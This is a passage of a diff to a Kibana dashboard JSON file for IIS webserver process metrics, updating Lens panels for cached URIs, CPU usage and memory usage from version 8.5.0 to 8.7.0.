"cff61a8f-0ede-4904-b9b0-835bf244ef48X1" - ], - "scale": "ratio" - }, - "cff61a8f-0ede-4904-b9b0-835bf244ef48X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.current_uris_cached: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.current_uris_cached))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.current_uris_cached" - }, - "cff61a8f-0ede-4904-b9b0-835bf244ef48X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.current_uris_cached))", - "operationType": "overall_max", - "references": [ - "cff61a8f-0ede-4904-b9b0-835bf244ef48X0" - ], - "scale": "ratio" - }, - "f65e7ff2-ff89-43cb-96ab-1f8a5ff7a0ec": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.current_uris_cached: *" - }, - "isBucketed": false, - "label": "Current Uris Cached", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.current_uris_cached" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#D31569", - "layerId": "7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd", - "layerType": "data", - "maxAccessor": "cff61a8f-0ede-4904-b9b0-835bf244ef48", - "metricAccessor": "f65e7ff2-ff89-43cb-96ab-1f8a5ff7a0ec", - "progressDirection": "horizontal" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" }, - "gridData": { - "h": 9, - "i": "90575b21-d32b-46c4-a798-a2919f4f9129", - "w": 5, - "x": 0, - "y": 14 + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" }, - "panelIndex": "90575b21-d32b-46c4-a798-a2919f4f9129", - "title": "Current Uris Cached", - "type": "lens", - "version": "8.5.0" + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-fa377d0e-caba-4a88-a021-da76b4140636", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "fa377d0e-caba-4a88-a021-da76b4140636": { - "columnOrder": [ - "49cc7bbf-35d0-4177-a236-358fa3a5bb95", - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0", - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X0", - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X1" - ], - "columns": { - "49cc7bbf-35d0-4177-a236-358fa3a5bb95": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.total_uris_cached: *" - }, - "isBucketed": false, - "label": "Total Uris Cached", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.total_uris_cached" - }, - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.cache.total_uris_cached))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.cache.total_uris_cached))", - "isFormulaBroken": false - }, - "references": [ - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X1" - ], - "scale": "ratio" - }, - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.total_uris_cached: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.total_uris_cached))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.total_uris_cached" - }, - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.total_uris_cached))", - "operationType": "overall_max", - "references": [ - "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#5C15D3", - "layerId": "fa377d0e-caba-4a88-a021-da76b4140636", - "layerType": "data", - "maxAccessor": "bd3ce0f6-6a03-4d37-83cf-8524197b62a0", - "metricAccessor": "49cc7bbf-35d0-4177-a236-358fa3a5bb95", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "IO Operations" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "90575b21-d32b-46c4-a798-a2919f4f9129", + "w": 5, + "x": 0, + "y": 14 + }, + "panelIndex": "90575b21-d32b-46c4-a798-a2919f4f9129", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd": { + "columnOrder": [ + "f65e7ff2-ff89-43cb-96ab-1f8a5ff7a0ec", + "cff61a8f-0ede-4904-b9b0-835bf244ef48", + "cff61a8f-0ede-4904-b9b0-835bf244ef48X0", + "cff61a8f-0ede-4904-b9b0-835bf244ef48X1" + ], + "columns": { + "cff61a8f-0ede-4904-b9b0-835bf244ef48": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.cache.current_uris_cached))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.cache.current_uris_cached))", + "isFormulaBroken": false + }, + "references": [ + "cff61a8f-0ede-4904-b9b0-835bf244ef48X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 9, - "i": "00e3504a-5841-41ee-bdf6-e9e2633da51c", - "w": 5, - "x": 5, - "y": 14 - }, - "panelIndex": "00e3504a-5841-41ee-bdf6-e9e2633da51c", - "title": "Total Uris Cached", - "type": "lens", - "version": "8.5.0" + "cff61a8f-0ede-4904-b9b0-835bf244ef48X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.current_uris_cached: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.current_uris_cached))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.current_uris_cached" + }, + "cff61a8f-0ede-4904-b9b0-835bf244ef48X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.current_uris_cached))", + "operationType": "overall_max", + "references": [ + "cff61a8f-0ede-4904-b9b0-835bf244ef48X0" + ], + "scale": "ratio" + }, + "f65e7ff2-ff89-43cb-96ab-1f8a5ff7a0ec": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.current_uris_cached: *" + }, + "isBucketed": false, + "label": "Current Uris Cached", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.current_uris_cached" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#D31569", + "layerId": "7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd", + "layerType": "data", + "maxAccessor": "cff61a8f-0ede-4904-b9b0-835bf244ef48", + "metricAccessor": "f65e7ff2-ff89-43cb-96ab-1f8a5ff7a0ec", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8899c952-5940-4065-9cdb-5198d4d8c1f9", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "8899c952-5940-4065-9cdb-5198d4d8c1f9": { - "columnOrder": [ - "29da561e-8e3d-4182-b6cd-5c63ddbda0e3", - "bdb43cdc-5f64-43cd-8315-af9627e10b00" - ], - "columns": { - "29da561e-8e3d-4182-b6cd-5c63ddbda0e3": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "bdb43cdc-5f64-43cd-8315-af9627e10b00": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "CPU Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.cpu_usage_perc" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "bdb43cdc-5f64-43cd-8315-af9627e10b00" - ], - "layerId": "8899c952-5940-4065-9cdb-5198d4d8c1f9", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "29da561e-8e3d-4182-b6cd-5c63ddbda0e3", - "yConfig": [ - { - "axisMode": "left", - "color": "#3185FC", - "forAccessor": "bdb43cdc-5f64-43cd-8315-af9627e10b00" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Current Uris Cached" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "00e3504a-5841-41ee-bdf6-e9e2633da51c", + "w": 5, + "x": 5, + "y": 14 + }, + "panelIndex": "00e3504a-5841-41ee-bdf6-e9e2633da51c", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-fa377d0e-caba-4a88-a021-da76b4140636", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fa377d0e-caba-4a88-a021-da76b4140636": { + "columnOrder": [ + "49cc7bbf-35d0-4177-a236-358fa3a5bb95", + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0", + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X0", + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X1" + ], + "columns": { + "49cc7bbf-35d0-4177-a236-358fa3a5bb95": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.total_uris_cached: *" + }, + "isBucketed": false, + "label": "Total Uris Cached", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.total_uris_cached" + }, + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.cache.total_uris_cached))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.cache.total_uris_cached))", + "isFormulaBroken": false + }, + "references": [ + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.total_uris_cached: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.total_uris_cached))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.total_uris_cached" + }, + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.total_uris_cached))", + "operationType": "overall_max", + "references": [ + "bd3ce0f6-6a03-4d37-83cf-8524197b62a0X0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#5C15D3", + "layerId": "fa377d0e-caba-4a88-a021-da76b4140636", + "layerType": "data", + "maxAccessor": "bd3ce0f6-6a03-4d37-83cf-8524197b62a0", + "metricAccessor": "49cc7bbf-35d0-4177-a236-358fa3a5bb95", + "progressDirection": "horizontal" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total Uris Cached" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "73429e76-7391-4cb0-94d4-6a7f0eae0803", + "w": 24, + "x": 0, + "y": 23 + }, + "panelIndex": "73429e76-7391-4cb0-94d4-6a7f0eae0803", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8899c952-5940-4065-9cdb-5198d4d8c1f9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8899c952-5940-4065-9cdb-5198d4d8c1f9": { + "columnOrder": [ + "29da561e-8e3d-4182-b6cd-5c63ddbda0e3", + "bdb43cdc-5f64-43cd-8315-af9627e10b00" + ], + "columns": { + "29da561e-8e3d-4182-b6cd-5c63ddbda0e3": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "bdb43cdc-5f64-43cd-8315-af9627e10b00": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "CPU Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 1 + } + } + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.cpu_usage_perc" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "bdb43cdc-5f64-43cd-8315-af9627e10b00" + ], + "layerId": "8899c952-5940-4065-9cdb-5198d4d8c1f9", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "seriesType": "line", + "xAccessor": "29da561e-8e3d-4182-b6cd-5c63ddbda0e3", + "yConfig": [ + { + "axisMode": "left", + "color": "#3185FC", + "forAccessor": "bdb43cdc-5f64-43cd-8315-af9627e10b00" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" }, - "gridData": { - "h": 15, - "i": "73429e76-7391-4cb0-94d4-6a7f0eae0803", - "w": 24, - "x": 0, - "y": 23 + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" }, - "panelIndex": "73429e76-7391-4cb0-94d4-6a7f0eae0803", - "title": "CPU Usage", - "type": "lens", - "version": "8.5.0" + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-2cc87279-fd94-4e95-ab66-ab2585b855c5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-317f3825-6707-4b9b-af65-dc79a25e6360", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-abc76e4a-ddb7-4d6a-9cfb-041f1cf17535", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU Usage" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "049042c8-335a-4a0f-834b-97d2fa0efc62", + "w": 24, + "x": 24, + "y": 23 + }, + "panelIndex": "049042c8-335a-4a0f-834b-97d2fa0efc62", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2cc87279-fd94-4e95-ab66-ab2585b855c5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-317f3825-6707-4b9b-af65-dc79a25e6360", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-abc76e4a-ddb7-4d6a-9cfb-041f1cf17535", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2cc87279-fd94-4e95-ab66-ab2585b855c5": { + "columnOrder": [ + "f5f6b376-3047-4471-9f0c-f615b00f961e", + "c8b59433-2924-4437-a385-60c9bc32a310" + ], + "columns": { + "c8b59433-2924-4437-a385-60c9bc32a310": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Virtual Bytes", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "2cc87279-fd94-4e95-ab66-ab2585b855c5": { - "columnOrder": [ - "f5f6b376-3047-4471-9f0c-f615b00f961e", - "c8b59433-2924-4437-a385-60c9bc32a310" - ], - "columns": { - "c8b59433-2924-4437-a385-60c9bc32a310": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Virtual Bytes", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.virtual_bytes" - }, - "f5f6b376-3047-4471-9f0c-f615b00f961e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - }, - "317f3825-6707-4b9b-af65-dc79a25e6360": { - "columnOrder": [ - "a59431a7-a573-4899-addd-60959bcbb420", - "a97dceba-f368-47fb-b537-af02cd8ab7e1" - ], - "columns": { - "a59431a7-a573-4899-addd-60959bcbb420": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "a97dceba-f368-47fb-b537-af02cd8ab7e1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Working Set", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.working_set" - } - }, - "incompleteColumns": {} - }, - "abc76e4a-ddb7-4d6a-9cfb-041f1cf17535": { - "columnOrder": [ - "26de4342-767f-4b20-b407-1103af88a599", - "5d68f5c0-defb-4876-b833-3a96972af5b9" - ], - "columns": { - "26de4342-767f-4b20-b407-1103af88a599": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "5d68f5c0-defb-4876-b833-3a96972af5b9": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Private Bytes", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.private_bytes" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "5d68f5c0-defb-4876-b833-3a96972af5b9" - ], - "layerId": "abc76e4a-ddb7-4d6a-9cfb-041f1cf17535", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "26de4342-767f-4b20-b407-1103af88a599", - "yConfig": [ - { - "axisMode": "left", - "color": "#3185FC", - "forAccessor": "5d68f5c0-defb-4876-b833-3a96972af5b9" - } - ] - }, - { - "accessors": [ - "c8b59433-2924-4437-a385-60c9bc32a310" - ], - "layerId": "2cc87279-fd94-4e95-ab66-ab2585b855c5", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "f5f6b376-3047-4471-9f0c-f615b00f961e", - "yConfig": [ - { - "axisMode": "left", - "color": "#68BC00", - "forAccessor": "c8b59433-2924-4437-a385-60c9bc32a310" - } - ] - }, - { - "accessors": [ - "a97dceba-f368-47fb-b537-af02cd8ab7e1" - ], - "layerId": "317f3825-6707-4b9b-af65-dc79a25e6360", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "a59431a7-a573-4899-addd-60959bcbb420", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(149,0,188,1)", - "forAccessor": "a97dceba-f368-47fb-b537-af02cd8ab7e1" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.virtual_bytes" + }, + "f5f6b376-3047-4471-9f0c-f615b00f961e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + }, + "317f3825-6707-4b9b-af65-dc79a25e6360": { + "columnOrder": [ + "a59431a7-a573-4899-addd-60959bcbb420", + "a97dceba-f368-47fb-b537-af02cd8ab7e1" + ], + "columns": { + "a59431a7-a573-4899-addd-60959bcbb420": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "a97dceba-f368-47fb-b537-af02cd8ab7e1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Working Set", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.working_set" + } + }, + "incompleteColumns": {} + }, + "abc76e4a-ddb7-4d6a-9cfb-041f1cf17535": { + "columnOrder": [ + "26de4342-767f-4b20-b407-1103af88a599", + "5d68f5c0-defb-4876-b833-3a96972af5b9" + ], + "columns": { + "26de4342-767f-4b20-b407-1103af88a599": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "5d68f5c0-defb-4876-b833-3a96972af5b9": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Private Bytes", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + } + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.private_bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "5d68f5c0-defb-4876-b833-3a96972af5b9" + ], + "layerId": "abc76e4a-ddb7-4d6a-9cfb-041f1cf17535", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "26de4342-767f-4b20-b407-1103af88a599", + "yConfig": [ + { + "axisMode": "left", + "color": "#3185FC", + "forAccessor": "5d68f5c0-defb-4876-b833-3a96972af5b9" + } + ] + }, + { + "accessors": [ + "c8b59433-2924-4437-a385-60c9bc32a310" + ], + "layerId": "2cc87279-fd94-4e95-ab66-ab2585b855c5", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "seriesType": "line", + "xAccessor": "f5f6b376-3047-4471-9f0c-f615b00f961e", + "yConfig": [ + { + "axisMode": "left", + "color": "#68BC00", + "forAccessor": "c8b59433-2924-4437-a385-60c9bc32a310" + } + ] + }, + { + "accessors": [ + "a97dceba-f368-47fb-b537-af02cd8ab7e1" + ], + "layerId": "317f3825-6707-4b9b-af65-dc79a25e6360", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "a59431a7-a573-4899-addd-60959bcbb420", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(149,0,188,1)", + "forAccessor": "a97dceba-f368-47fb-b537-af02cd8ab7e1" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true }, - "gridData": { - "h": 15, - "i": "049042c8-335a-4a0f-834b-97d2fa0efc62", - "w": 24, - "x": 24, - "y": 23 + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "049042c8-335a-4a0f-834b-97d2fa0efc62", - "title": "Memory Usage", - "type": "lens", - "version": "8.5.0" - } - ], - "timeRestore": false, - "title": "[Metrics IIS] Webserver Process Overview", - "version": 1 - }, - "coreMigrationVersion": "8.5.0", - "id": "iis-2c171500-858b-11ea-91bc-ab084c7ec0e7", - "migrationVersion": { - "dashboard": "8.5.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "1f700551-5464-467f-99ec-3b329e355195:indexpattern-datasource-layer-182147bc-f15e-4d7e-80f0-f63350a5b838", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d2f639d2-4288-4110-871d-c123e43a8a5f:indexpattern-datasource-layer-0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8392c4c6-1aed-4e8d-9015-15526bc1ceb6:indexpattern-datasource-layer-36bd76ba-75e7-4da3-9b47-1761f2a90360", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9acc09af-8176-4625-927d-af97d4b5080b:indexpattern-datasource-layer-3282c038-29da-4266-a759-0329ac8b34c1", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "de5da809-a2ac-4388-9040-ed6f037c901d:indexpattern-datasource-layer-092efddb-12b7-4c7e-b10f-37878ddd82e0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a64ca567-3295-4753-9a22-2ce5dcb16a40:indexpattern-datasource-layer-7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c805cba0-cce2-4c3a-8626-492958427932:indexpattern-datasource-layer-53550c84-3d37-4bfe-9059-5cc839edce4c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 